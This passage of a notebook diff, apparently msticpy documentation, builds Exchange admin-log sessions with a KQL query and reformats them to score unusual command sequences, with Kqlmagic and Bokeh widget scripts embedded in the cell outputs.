+       "                        window_obj.close();\n",
+       "                        if (itself_secs >= 0) {\n",
+       "                            __timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                        }\n",
+       "                    }, obj_secs * 1000);\n",
+       "                } else if (itself_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                }\n",
+       "            }\n",
+       "\n",
+       "            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, host_or_text) {\n",
+       "                var url;\n",
+       "                if (host_or_text == 'text') {\n",
+       "                    url = ''\n",
+       "                } else if (file_path.startsWith('http')) {\n",
+       "                    url = file_path;\n",
+       "                } else {\n",
+       "                    var base_url = '';\n",
+       "\n",
+       "                    // check if azure notebook\n",
+       "                    var azure_host = (host_or_text == null || host_or_text.length == 0) ? 'https://notebooks.azure.com' : host_or_text;\n",
+       "                    var start = azure_host.search('//');\n",
+       "                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n",
+       "\n",
+       "                    var loc = String(window.location);\n",
+       "                    var end = loc.search(azure_host_suffix);\n",
+       "                    start = loc.search('//');\n",
+       "                    if (start > 0 && end > 0) {\n",
+       "                        var parts = loc.substring(start+2, end).split('-');\n",
+       "                        if (parts.length == 2) {\n",
+       "                            var library = parts[0];\n",
+       "                            var user = parts[1];\n",
+       "                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // check if local jupyter lab\n",
+       "                    if (base_url.length == 0) {\n",
+       "                        var configDataScipt  = document.getElementById('jupyter-config-data');\n",
+       "                        if (configDataScipt != null) {\n",
+       "                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n",
+       "                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n",
+       "                                var basePath = 'C:/Users/kadixit/Desktop/repos/msticpy/docs/notebooks' + '/';\n",
+       "                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n",
+       "                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n",
+       "                                }\n",
+       "                            }\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // assume local jupyter notebook\n",
+       "                    if (base_url.length == 0) {\n",
+       "\n",
+       "                        var parts = loc.split('/');\n",
+       "                        parts.pop();\n",
+       "                        base_url = parts.join('/') + '/';\n",
+       "                    }\n",
+       "                    url = base_url + file_path;\n",
+       "                }\n",
+       "\n",
+       "                window.focus();\n",
+       "                var w = screen.width / 2;\n",
+       "                var h = screen.height / 2;\n",
+       "                params = 'width='+w+',height='+h;\n",
+       "                // kql_Magic + window_name should be a global variable \n",
+       "                window_obj = window.open(url, window_name, window_params + params);\n",
+       "                if (url == '') {\n",
+       "                    var el = window_obj.document.createElement('p');\n",
+       "                    window_obj.document.body.overflow = 'auto';\n",
+       "                    el.style.top = 0;\n",
+       "                    el.style.left = 0;\n",
+       "                    el.innerHTML = file_path;\n",
+       "                    window_obj.document.body.appendChild(el);\n",
+       "                }\n",
+       "                kql_Magic__ab86c959_1ba3_495c_a00d_ced30d8825d3_at_loganalytics_schema = window_obj;\n",
+       "            }\n",
+       "            </script>\n",
+       "\n",
+       "            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Try to read workspace configuration from msticpyconfig.yaml, and then authenticate\n",
+    "try:\n",
+    "    ws_config = WorkspaceConfig(workspace='Default')\n",
+    "    qry_prov = QueryProvider(data_environment=\"LogAnalytics\")\n",
+    "    qry_prov.connect(connection_str=ws_config.code_connect_str)\n",
+    "except:\n",
+    "    print('There is an issue with reading in the config file. Please fill in the following manually.')\n",
+    "    tenant_id = input(\"Please enter your Log Analytics tenant id:\")\n",
+    "    workspace_id = input(\"Please enter your Log Analytics workspace id:\")\n",
+    "    la_connection_string = 'loganalytics://code().tenant(\"{}\").workspace(\"{}\")'.format(tenant_id, workspace_id)\n",
+    "    qry_prov = QueryProvider(data_environment=\"LogAnalytics\")\n",
+    "    qry_prov.connect(connection_str=la_connection_string)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Sessionize Office Activity Logs <a id='office_sessions'></a>\n",
+    "\n",
+    "The cell below contains a kusto query which queries the OfficeActivity table in Log Analytics. In this example, we wish for the sessions to be on a per UserId - ClientIP basis. In addition, we require that each session be no longer than 20 minutes in total, with each command no more than 2 minutes apart from each other. (These requirements can be adjusted for different data-sets/use-cases etc).\n",
+    "\n",
+    "\n",
+    "<b>Here are some high level steps to the query:</b>\n",
+    "\n",
+    "- Add a time filter which goes back far enough so you have enough data to train the model.\n",
+    "- Filter to the desired type of logs.\n",
+    "- Exclude some known automated users (optional)\n",
+    "- Sort the rows by UserId, ClientIp, TimeGenerated in ascending order\n",
+    "- Use the native KQL function row_window_session to create an additional \"begin\" column to aid creating the sessions\n",
+    "- Summarize the commands (and optionally parameters) by UserId, ClientIp, begin\n",
+    "- Optionally exclude sessions which have only 1 command\n",
+    "\n",
+    "Note that in KQL, comments are made using //"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# write kql query\n",
+    "query = \"\"\"\n",
+    "let time_back = 60d;\n",
+    "OfficeActivity\n",
+    "| where TimeGenerated >= ago(time_back)\n",
+    "//\n",
+    "// filter to the event type of interest\n",
+    "| where RecordType == 'ExchangeAdmin'\n",
+    "//\n",
+    "// exclude some known automated users\n",
+    "| where UserId !startswith \"NT AUTHORITY\" and UserId !contains \"prod.outlook.com\"  \n",
+    "//\n",
+    "// create new dynamic variable with the command as the key, and the parameters as the values\n",
+    "| extend params = todynamic(strcat('{\"', Operation, '\" : ', tostring(Parameters), '}')) \n",
+    "| project TimeGenerated, UserId, ClientIP, Operation, params\n",
+    "//\n",
+    "// sort by the user related columns and the timestamp column in ascending order\n",
+    "| sort by UserId asc, ClientIP asc, TimeGenerated asc\n",
+    "//\n",
+    "// calculate the start time of each session into the \"begin\" variable\n",
+    "// With each session max 20 mins in length with each event at most 2 mins apart.\n",
+    "// A new session is created each time one of the user related columns change.\n",
+    "| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP))\n",
+    "//\n",
+    "// summarize the operations and the params by the user related variables and the \"begin\" variable\n",
+    "| summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation),\n",
+    "params=makelist(params) by UserId, ClientIP, begin\n",
+    "//\n",
+    "//optionally specify an order to the final columns\n",
+    "| project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params\n",
+    "//\n",
+    "// optionally filter out sessions which contain only one event\n",
+    "//| where nCmds > 1\n",
+    "\"\"\""
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# execute the queryl\n",
+    "exchange_df = qry_prov.exec_query(query=query)\n",
+    "# I comment out this cell and run it again once it has run to prevent the notebook from slowing down"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(252, 9)\n"
+     ]
+    }
+   ],
+   "source": [
+    "try:\n",
+    "    print(exchange_df.shape)\n",
+    "except AttributeError as e:\n",
+    "    exchange_df = _kql_raw_result_.to_dataframe()\n",
+    "    print(exchange_df.shape)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>nCmds</th>\n",
+       "      <th>nDistinctCmds</th>\n",
+       "      <th>begin</th>\n",
+       "      <th>end</th>\n",
+       "      <th>duration</th>\n",
+       "      <th>cmds</th>\n",
+       "      <th>params</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2020-03-31 02:19:26+00:00</td>\n",
+       "      <td>2020-03-31 02:19:28+00:00</td>\n",
+       "      <td>00:00:02</td>\n",
+       "      <td>[Remove-MailboxLocation, Set-User]</td>\n",
+       "      <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-03-31 22:02:51+00:00</td>\n",
+       "      <td>2020-03-31 22:02:51+00:00</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>[Set-User]</td>\n",
+       "      <td>[{'Set-User': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\\\a2409f54-2a3...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2020-04-01 20:12:19+00:00</td>\n",
+       "      <td>2020-04-01 20:12:55+00:00</td>\n",
+       "      <td>00:00:36</td>\n",
+       "      <td>[Remove-MailboxLocation, Set-User]</td>\n",
+       "      <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>3</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2020-04-02 09:01:22+00:00</td>\n",
+       "      <td>2020-04-02 09:01:38+00:00</td>\n",
+       "      <td>00:00:16</td>\n",
+       "      <td>[Remove-MailboxLocation, Remove-MailboxLocation, Set-User]</td>\n",
+       "      <td>[{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-04-02 13:49:42+00:00</td>\n",
+       "      <td>2020-04-02 13:49:42+00:00</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy]</td>\n",
+       "      <td>[{'Set-ConditionalAccessPolicy': [{'Name': 'Identity', 'Value': 'seccxpninja.onmicrosoft.com\\\\64...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  UserId ClientIP  nCmds  nDistinctCmds                     begin  \\\n",
+       "0                      2              2 2020-03-31 02:19:26+00:00   \n",
+       "1                      1              1 2020-03-31 22:02:51+00:00   \n",
+       "2                      2              2 2020-04-01 20:12:19+00:00   \n",
+       "3                      3              2 2020-04-02 09:01:22+00:00   \n",
+       "4                      1              1 2020-04-02 13:49:42+00:00   \n",
+       "\n",
+       "                        end duration  \\\n",
+       "0 2020-03-31 02:19:28+00:00 00:00:02   \n",
+       "1 2020-03-31 22:02:51+00:00 00:00:00   \n",
+       "2 2020-04-01 20:12:55+00:00 00:00:36   \n",
+       "3 2020-04-02 09:01:38+00:00 00:00:16   \n",
+       "4 2020-04-02 13:49:42+00:00 00:00:00   \n",
+       "\n",
+       "                                                         cmds  \\\n",
+       "0                          [Remove-MailboxLocation, Set-User]   \n",
+       "1                                                  [Set-User]   \n",
+       "2                          [Remove-MailboxLocation, Set-User]   \n",
+       "3  [Remove-MailboxLocation, Remove-MailboxLocation, Set-User]   \n",
+       "4                               [Set-ConditionalAccessPolicy]   \n",
+       "\n",
+       "                                                                                                params  \n",
+       "0  [{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...  \n",
+       "1  [{'Set-User': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\\\a2409f54-2a3...  \n",
+       "2  [{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...  \n",
+       "3  [{'Remove-MailboxLocation': [{'Name': 'Identity', 'Value': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c...  \n",
+       "4  [{'Set-ConditionalAccessPolicy': [{'Name': 'Identity', 'Value': 'seccxpninja.onmicrosoft.com\\\\64...  "
+      ]
+     },
+     "execution_count": 28,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "exchange_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Convert Exchange Sessions to Correct Format for the Model <a id='clean_exchange'></a>\n",
+    "\n",
+    "Recall the allowed session types [here](#create_sessions)\n",
+    "\n",
+    "<b>So let's see what needs to be done to the exchange_df</b>\n",
+    "\n",
+    "- The \"cmds\" column is already in a suitable format of type (1). This is because it is a list of strings.\n",
+    "- If we wish to also include the parameters (and optionally the corresponding values) to the model, then we need to transform the \"params\" column slightly"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 29,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# define a helper function for converting the sessions with params (and values) into a suitable format\n",
+    "\n",
+    "def process_exchange_session(session_with_params: [List[Dict[str, List[Dict[str, str]]]]], include_vals: bool) -> List[Cmd]:\n",
+    "    \"\"\"\n",
+    "    Converts an exchange session with params to an allowed format.\n",
+    "    \n",
+    "    param session_with_params: example format:\n",
+    "        [\n",
+    "            {'Set-Mailbox': [{'Name': 'MessageCopyForSentAsEnabled', 'Value': 'True'}, \n",
+    "            {'Name': 'Identity', 'Value': 'blahblah@blah.com'}]}\n",
+    "        ]\n",
+    "    param include_vals: if True, then it will be transformed to a format which includes the values, \n",
+    "        else the output will just contain the parameters\n",
+    "    \n",
+    "    return: list of the Cmd data type which includes either just the parameters, or also the corresponding values\n",
+    "    \"\"\"\n",
+    "    new_ses = []\n",
+    "    for cmd in session_with_params:\n",
+    "        c = list(cmd.keys())[0]\n",
+    "        par = list(cmd.values())[0]\n",
+    "        new_pars = set()\n",
+    "        if include_vals:\n",
+    "            new_pars = dict()\n",
+    "        for p in par:\n",
+    "            if include_vals:\n",
+    "                new_pars[p['Name']] = p['Value']\n",
+    "            else:\n",
+    "                new_pars.add(p['Name'])\n",
+    "        new_ses.append(Cmd(name=c, params=new_pars))\n",
+    "    return new_ses  "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 30,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's create suitable sessions for params, and suitable sessions for params + values\n",
+    "sessions = exchange_df.cmds.values.tolist()\n",
+    "param_sessions = []\n",
+    "param_value_sessions = []\n",
+    "\n",
+    "for ses in exchange_df.params.values.tolist():\n",
+    "    new_ses_set = process_exchange_session(session_with_params=ses, include_vals=False)\n",
+    "    new_ses_dict = process_exchange_session(session_with_params=ses, include_vals=True)\n",
+    "    param_sessions.append(new_ses_set)\n",
+    "    param_value_sessions.append(new_ses_dict)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 32,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['Remove-MailboxLocation', 'Set-User']\n",
+      "[Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'}), Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})]\n",
+      "[Cmd(name='Remove-MailboxLocation', params={'Identity': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\\\b81afc79-520a-4143-bbc4-b8cadc11d007', 'Confirm': 'False', 'ErrorAction': 'Stop'}), Cmd(name='Set-User', params={'Identity': '4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\\\a2409f54-2a30-4647-ba61-3cb44edc1a5a', 'SyncMailboxLocationGuids': 'True', 'ErrorAction': 'Stop'})]\n"
+     ]
+    }
+   ],
+   "source": [
+    "# let's see the differences between the three types of sessions\n",
+    "ind = 0\n",
+    "\n",
+    "print(sessions[ind][:3])\n",
+    "\n",
+    "print(param_sessions[ind][:3])\n",
+    "\n",
+    "print(param_value_sessions[ind][:3])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 33,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's add these reformatted sessions as columns to a dataframe\n",
+    "data = exchange_df\n",
+    "data['session'] = sessions\n",
+    "data['param_session'] = param_sessions\n",
+    "data['param_value_session'] = param_value_sessions"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Now we will model and visualise these sessions in one go.\n",
+    "\n",
+    "We do this using the <b>score_and_visualise_sessions</b> function.\n",
+    "\n",
+    "Since we created columns for all 3 session types, the session_column argument can be set to any of the following:\n",
+    "\n",
+    "- session\n",
+    "- param_session\n",
+    "- param_value_session"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1651\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1651\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
